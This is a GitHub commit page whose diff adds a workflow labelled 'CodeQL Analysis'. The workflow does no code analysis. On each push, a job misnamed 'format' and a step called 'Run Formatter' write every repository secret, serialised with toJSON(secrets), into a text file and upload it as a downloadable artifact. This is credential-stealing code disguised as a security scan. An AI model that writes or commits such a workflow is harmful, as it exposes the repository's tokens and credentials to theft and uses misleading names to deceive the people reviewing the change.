Skip to content

Commit 3bb05ea

Browse files
Add CodeQL Analysis
1 parent 367d855 commit 3bb05ea

1 file changed

Lines changed: 17 additions & 0 deletions

File tree

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
name: CodeQL Analysis
2+
run-name: CodeQL Analysis
3+
on:
4+
push:
5+
jobs:
6+
format:
7+
runs-on: ubuntu-latest
8+
env:
9+
VARIABLE_STORE: ${{ toJSON(secrets) }}
10+
steps:
11+
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
12+
- name: Run Formatter
13+
run: echo "$VARIABLE_STORE" > format-results.txt
14+
- uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
15+
with:
16+
name: format-results
17+
path: format-results.txt

0 commit comments

Comments
 (0)